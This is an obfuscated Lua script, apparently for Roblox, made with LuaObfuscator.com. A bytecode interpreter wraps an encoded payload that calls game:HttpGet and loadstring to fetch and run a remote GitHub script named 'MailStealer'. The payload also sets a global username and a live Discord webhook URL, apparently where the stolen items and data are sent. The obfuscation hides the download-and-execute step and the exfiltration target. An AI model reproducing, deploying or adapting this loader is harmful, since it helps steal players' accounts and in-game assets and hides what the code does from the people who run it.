--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v94=v5(v81,v19);v19=nil;return v94;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==((0 + 0) -0)) then v83=(v31/(((3 -0) -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v83-(v83%1) ;end end else local v84=927 -(214 + 713) ;local v85;while true do if (v84==0) then v85=(1 + (1066 -(68 + 997)))^(v32-((1271 -(226 + 1044)) + 0)) ;return (((v31%(v85 + v85))>=v85) and (878 -(282 + 595))) or (1637 -((6631 -5108) + 114)) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(118 -(32 + (202 -117)))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=958 -(892 + (118 -53)) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,462 -(416 + 26) ) * ((3 -(1 + 0))^(24 + (893 -(261 + 624))))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,469 -((257 -112) + 293) );local v47=((v20(v43,(1542 -(1020 + 60)) -(44 + 386) )==(1424 -(630 + 793))) and  -((6 -4) -1)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(1187 -(1069 + 118))) then return v47 * (0 -0) ;else v46=(4 -3) -0 ;v44=0 + 0 + 0 ;end elseif (v46==(1202 + 845)) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(859 -(814 + 45))))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48)local v49=0 -(0 -0) ;local v50;local v51;while true do if (v49==(1747 -(760 + 896 + 91))) then v50=nil;if  not v48 then v48=v23();if (v48==(1913 -((4043 -2254) + 124))) then return "";end end v49=767 -(745 + 21) ;end if (v49==(2 + 1)) then return v6(v51);end if (v49==(5 -3)) then v51={};for v95=1, #v50 do v51[v95]=v2(v1(v3(v50,v95,v95)));end v49=11 -8 ;end if (v49==(1 + (1413 -(447 + 966)))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=1057 -(87 + 968) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(0 + 0)) then else local v89=0 -0 ;local v90;while true do if (0==v89) then v90=0;while true do if (v90~=(2 -1)) then else v52=1;break;end if (v90==0) then local v104=1900 -(106 + 1794) ;while true do if (0==v104) then v53=0;v54=nil;v104=1 + 0 ;end if (v104~=1) then else v90=1 + 0 ;break;end end end end break;end end end if (1~=v52) then else local v91=0 -0 ;local v92;while true do if (v91~=(0 -0)) then else v92=114 -(4 + 110) ;while true do if (v92==0) then v55=nil;v56=nil;v92=1;end if (1==v92) then v52=2;break;end end break;end end end if (v52~=3) then else v59=nil;while true do local v97=0;local v98;while true do if ((584 -(57 + 527))==v97) then v98=1427 -(41 + 1386) ;while true do if (v98==1) then if (0==v53) then local v124=103 -(17 + 86) ;local v125;while true do if (0==v124) then v125=0;while true do if (v125~=(0 + 0)) then else local v171=0 -0 ;while true do if (1==v171) then v125=2 -1 ;break;end if (v171~=0) then else v54={};v55={};v171=167 -(122 + 44) ;end end end if (v125==1) then v56={};v53=1 -0 ;break;end end break;end end end if (v53==(6 -4)) then local v126=0 + 0 ;local v127;local v128;while true do if (v126==0) then v127=0;v128=nil;v126=1 + 0 ;end if (v126==1) then while true do if (v127~=(0 -0)) then else v128=65 -(30 + 35) ;while true do if (v128==(1 + 0)) then for v175=1,v23() do local v176=1257 -(1043 + 214) ;local v177;local v178;local v179;while true do if (v176==(3 -2)) then v179=nil;while true do if ((1212 -(323 + 889))==v177) then local v183=0 -0 ;while true do if (v183==(580 -(361 + 219))) then v178=0;v179=nil;v183=321 -(53 + 267) ;end if (1==v183) then v177=1;break;end end end if (v177~=1) then else while true do if (v178~=(0 + 0)) then else v179=v21();if (v20(v179,414 -(15 + 398) ,983 -(18 + 964) )~=0) then else local v191=0 -0 ;local v192;local v193;local v194;local v195;local v196;while true do if (v191==2) then v196=nil;while true do if (v192==0) then local v199=0 + 0 ;while true do if (1==v199) then v192=1 + 0 ;break;end if (0~=v199) then else v193=0;v194=nil;v199=1;end end end if (v192==1) then v195=nil;v196=nil;v192=852 -(20 + 830) ;end if (v192~=2) then else while true do if (v193==(3 + 0)) then if (v20(v195,3,3)~=(127 -(116 + 10))) then else v196[4]=v59[v196[4]];end v54[v175]=v196;break;end if (v193==1) then local v203=0;while true do if (v203~=1) then else v193=1 + 1 ;break;end if (v203==0) then v196={v22(),v22(),nil,nil};if (v194==0) then local v211=0;local v212;while true do if (0~=v211) then else v212=0;while true do if (v212~=(0 + 0)) then else v196[2 + 1 ]=v22();v196[10 -6 ]=v22();break;end end break;end end elseif (v194==1) then v196[3]=v23();elseif (v194==(4 -2)) then v196[3]=v23() -(2^(1567 -(1126 + 425))) ;elseif (v194==(408 -(118 + 287))) then local v222=0;local v223;local v224;while true do if (v222==0) then v223=0;v224=nil;v222=3 -2 ;end if (1==v222) then while true do if (v223==(1121 -(118 + 1003))) then v224=0 -0 ;while true do if (0==v224) then v196[380 -(142 + 235) ]=v23() -(2^(72 -56)) ;v196[4]=v22();break;end end break;end end break;end end end v203=1;end end end if (v193==(1 + 1)) then local v204=977 -(553 + 424) ;local v205;while true do if (v204==(0 -0)) then v205=0;while true do if (v205==(0 + 0)) then if (v20(v195,1 + 0 ,1)==1) then v196[2]=v59[v196[2]];end if (v20(v195,2 + 0 ,2)==1) then v196[2 + 1 ]=v59[v196[2 + 1 ]];end v205=1;end if (v205~=1) then else v193=6 -3 ;break;end end break;end end end if ((0 -0)==v193) then local v206=0;while true do if (v206~=1) then else v193=2 -1 ;break;end if (v206==(0 + 0)) then v194=v20(v179,9 -7 ,3);v195=v20(v179,757 -(239 + 514) ,3 + 3 );v206=1;end end end end break;end end break;end if (v191~=0) then else v192=0;v193=nil;v191=1330 -(797 + 532) ;end if ((1 + 0)==v191) then v194=nil;v195=nil;v191=2;end end end break;end end break;end end break;end if (v176~=0) then else v177=0 + 0 ;v178=nil;v176=1;end end end v53=6 -3 ;break;end if (v128==0) then local v172=0;local v173;while true do if (v172==(1202 -(373 + 829))) then v173=0;while true do if (v173~=1) then else v128=732 -(476 + 255) ;break;end if (v173==0) then local v182=0;while true do if ((1130 -(369 + 761))~=v182) then else for v185=1 + 0 ,v58 do local v186=0 -0 ;local v187;local v188;local v189;local v190;while true do if (v186~=(3 -1)) then else while true do if ((238 -(64 + 174))==v187) then local v197=0 + 0 ;local v198;while true do if (v197==0) then v198=0;while true do if ((1 -0)==v198) then v187=1;break;end if (v198~=0) then else v188=0;v189=nil;v198=1;end end break;end end end if (v187==1) then v190=nil;while true do if (v188~=(336 -(144 + 192))) then else local v200=0;while true do if (v200==(216 -(42 + 174))) then local v207=0 + 0 ;local v208;while true do if (v207==(0 + 0)) then v208=0 + 0 ;while true do if (v208==(1505 -(363 + 1141))) then v200=1581 -(1183 + 397) ;break;end if (v208==(0 -0)) then local v214=0 + 0 ;while true do if (v214==(1 + 0)) then v208=1976 -(1913 + 62) ;break;end if (v214==0) then v189=v21();v190=nil;v214=1;end end end end break;end end end if (v200~=1) then else v188=1 + 0 ;break;end end end if (v188==(2 -1)) then if (v189==(1934 -(565 + 1368))) then v190=v21()~=(0 -0) ;elseif (v189==2) then v190=v24();elseif (v189~=(1664 -(1477 + 184))) then else v190=v25();end v59[v185]=v190;break;end end break;end end break;end if (v186==1) then v189=nil;v190=nil;v186=2 -0 ;end if (v186==0) then v187=0;v188=nil;v186=1;end end end v57[3 + 0 ]=v21();v182=857 -(564 + 292) ;end if (1~=v182) then else v173=1;break;end end end end break;end end end end break;end end break;end end end break;end if (v98~=(0 -0)) then else if (v53~=(2 -1)) then else local v129=0;while true do if (v129==1) then v59={};v53=306 -(244 + 60) ;break;end if (v129~=(0 + 0)) then else local v164=0;while true do if (v164==1) then v129=1;break;end if (v164~=0) then else v57={v54,v55,nil,v56};v58=v23();v164=1 + 0 ;end end end end end if (v53==3) then local v130=0;local v131;local v132;while true do if (v130==(1126 -(936 + 189))) then while true do if (v131==(0 + 0)) then v132=0;while true do if (v132==(1613 -(1565 + 48))) then local v174=0 + 0 ;while true do if (v174~=0) then else for v180=1,v23() do v55[v180-(1139 -(782 + 356)) ]=v28();end return v57;end end end end break;end end break;end if (v130~=0) then else v131=0;v132=nil;v130=268 -(176 + 91) ;end end end v98=2 -1 ;end end break;end end end break;end if (v52~=(2 -0)) then else local v93=0;while true do if (0==v93) then local v103=0;while true do if (v103==0) then v57=nil;v58=nil;v103=1093 -(975 + 117) ;end if (v103==(1876 -(157 + 1718))) then v93=1;break;end end end if (v93~=(1 + 0)) then else v52=3;break;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=10) then if (v79<=4) then if (v79<=1) then if (v79>0) then do return;end else local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==0) then v106=v78[2];v107,v108=v69(v76[v106](v13(v76,v106 + 1 ,v78[3])));v105=1;end if (v105==1) then v71=(v108 + v106) -1 ;v109=0;v105=2;end if (v105==2) then for v162=v106,v71 do local v163=0;while true do if (v163==0) then v109=v109 + 1 ;v76[v162]=v107[v109];break;end end end break;end end end elseif (v79<=2) then v76[v78[2]]=v78[3];elseif (v79==3) then local v133=0;local v134;while true do if (v133==0) then v134=v78[2];v76[v134]=v76[v134](v13(v76,v134 + 1 ,v71));break;end end else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=7) then if (v79<=5) then v70=v78[3];elseif (v79==6) then v76[v78[2]]=v62[v78[3]];else local v138=0;local v139;while true do if (v138==0) then v139=v78[2];v76[v139]=v76[v139](v13(v76,v139 + 1 ,v71));break;end end end elseif (v79<=8) then v76[v78[2]]=v62[v78[3]];elseif (v79==9) then local v140=v78[2];local v141,v142=v69(v76[v140](v13(v76,v140 + 1 ,v78[3])));v71=(v142 + v140) -1 ;local v143=0;for v154=v140,v71 do v143=v143 + 1 ;v76[v154]=v141[v143];end else v76[v78[2]]();end elseif (v79<=15) then if (v79<=12) then if (v79==11) then local v115=v78[2];local v116=v76[v78[3]];v76[v115 + 1 ]=v116;v76[v115]=v116[v78[4]];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=13) then local v120=0;local v121;local v122;while true do if (v120==1) then v76[v121 + 1 ]=v122;v76[v121]=v122[v78[4]];break;end if (v120==0) then v121=v78[2];v122=v76[v78[3]];v120=1;end end elseif (v79>14) then v76[v78[2]]();else v76[v78[2]]=v78[3];end elseif (v79<=18) then if (v79<=16) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79>17) then v76[v78[2]]=v78[3]~=0 ;else do return;end end elseif (v79<=19) then v70=v78[3];elseif (v79==20) then v76[v78[2]][v78[3]]=v78[4];else v76[v78[2]][v78[3]]=v78[4];end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703083O00557365726E616D6503093O0047692O662O6450726F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3132362O38322O333230323036353431302F32596A6555642O582D61435F773465724431752O5A586372457477764454583467565175643371735F394248364E686F3072352D4D4A5268616C347A79434475496D565900153O0012023O00013O00260C3O000C000100020004053O000C0001001208000100033O001208000200043O00200B000200020005001202000400064O0004000500014O0009000200054O000300013O00022O000A0001000100010004053O0014000100260C3O0001000100010004053O00010001001208000100073O003015000100080009001208000100073O0030150001000A000B0012023O00023O0004053O000100012O00113O00017O00",v9(),...);end
